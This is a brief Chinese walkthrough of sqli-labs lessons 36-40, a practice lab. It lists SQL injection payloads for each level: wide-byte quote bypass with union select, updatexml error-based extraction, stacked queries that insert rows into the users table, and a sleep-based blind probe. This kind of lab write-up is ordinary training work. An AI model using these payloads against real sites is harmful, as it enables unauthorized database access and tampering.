sqli-labs通关lesson36-40

1.lesson36 union select

判断注入：

为单引号注入

?id=1%df'-- +

查数据库：

?id=-1%df' union select 1,2,database()-- +

2.lesson-37 报错注入

判断注入：

为单引号注入

通过下方判断password为单引号注入

uname=z&passwd=g%df' -- +&submit=Submit

查数据库：

uname=z&passwd=g%df' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&submit=Submit

3.lesson-38 堆叠注入

判断注入：

为单引号注入

因为代码有mysqli_multi_query这个函数，造成了堆叠注入，这个函数可以执行多条sql语句

往表中插入数据

?id=1';insert into users (username,password) values('11','11');%23

1'；show database;-- +不可用,没有数据出来是因为代码只处理了第一个数据

union select 也可以查出数据

?id=-1' union select 1,2,database()-- +

4.lesson-39 堆叠注入

判断注入：

整型注入

?id=1';insert into users (username,password) values('22','22');%23

也可以用union select

-1 union select 1,2,database()

5.lesson-40 堆叠注入

判断注入：

没有报错，使用时间盲注判读闭合符号

?id=1') and sleep(5)-- +

插入数据：

?id=1');insert into users (username,password) values('33','33');%23

也可以用union select

-1') union select 1,2,database()-- +